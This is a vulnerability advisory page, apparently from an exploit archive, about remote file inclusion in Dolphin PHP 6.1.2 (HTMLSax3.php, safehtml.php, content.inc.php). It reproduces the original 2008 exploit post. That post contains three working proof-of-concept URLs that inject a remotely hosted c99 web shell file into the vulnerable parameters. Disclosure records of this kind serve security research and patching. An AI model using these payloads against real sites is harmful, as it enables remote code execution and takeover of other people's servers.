Dolphin PHP

vendor:

Dolphin

by:

RoMaNcYxHaCkEr [RoMaNTiC-TeaM] & Tryag.cc/cc [Member From Tryag Forum]

7.5

CVSS

HIGH

RFI In Multiple Files

CWE

Product Name: Dolphin

Affected Version From: 6.1.2002

Affected Version To: 6.1.2002

Patch Exists: NO

Related CWE: N/A

CPE: a:boonex:dolphin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Dolphin PHP version 6.1.2 is vulnerable to Remote File Inclusion in multiple files. The vulnerable files are HTMLSax3.php, safehtml.php and content.inc.php. An attacker can exploit this vulnerability by sending a malicious URL in the 'dir[plugins]' parameter of HTMLSax3.php, 'dir[plugins]' parameter of safehtml.php and 'sIncPath' parameter of content.inc.php.

Mitigation:

The mitigation for this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Name Of Script : Dolphin PHP

# Version : 6.1.2

# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI In Multiple Files

# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below

# POC : 

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :) 

# rXh

# bEST wISHES

# milw0rm.com [2008-07-08]